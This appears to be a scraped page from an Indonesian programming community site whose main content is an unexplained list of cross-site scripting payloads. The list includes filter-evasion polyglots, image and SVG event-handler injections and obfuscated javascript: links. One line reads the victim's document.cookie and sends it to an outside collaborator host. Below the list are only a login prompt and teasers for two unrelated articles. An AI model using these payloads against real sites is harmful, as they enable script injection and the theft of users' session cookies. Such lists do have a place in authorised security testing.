/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
">-setTimeout'\u0028alert(1)\u0029'-'
')"<svg onload​="const cred=document.cookie;console.log(new Image().src= `http://burpcolab?cookie=` +cred)";>   ato
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t​:console.log(1337)">XSS</a>

Silahkan masuk untuk menulis artikel atau komentar.



Artikel Lainnya


Irwansyah

31 Januari 2017

Bagaimana mengidentifikasi CMS yang digunakan pada sebuah situs website?

Selamat siang coder - coder hebat....

Sebagai seorang pengrajin web kita sering kepo melihat website-website yang pernah kita kunjungi, hal pertama yang ingin kita ketahui dari website tersebut adalah Framework apa ...

Lanjutkan membaca

7 menit bacaan



Irwansyah

4 September 2016

10 Langkah Utama Untuk Menjadi Seorang Programmer

Hallo coder Indonesia, senang bisa belajar di CodeSaya.

Sangat bermanfaat untuk newbie seperti saya, menambah wawasan tentang pengcodingan khususnya bahasa pemograman dan juga menambah teman di codesaya. ^.^

Artikel pengantar saya ...

Lanjutkan membaca

2 menit bacaan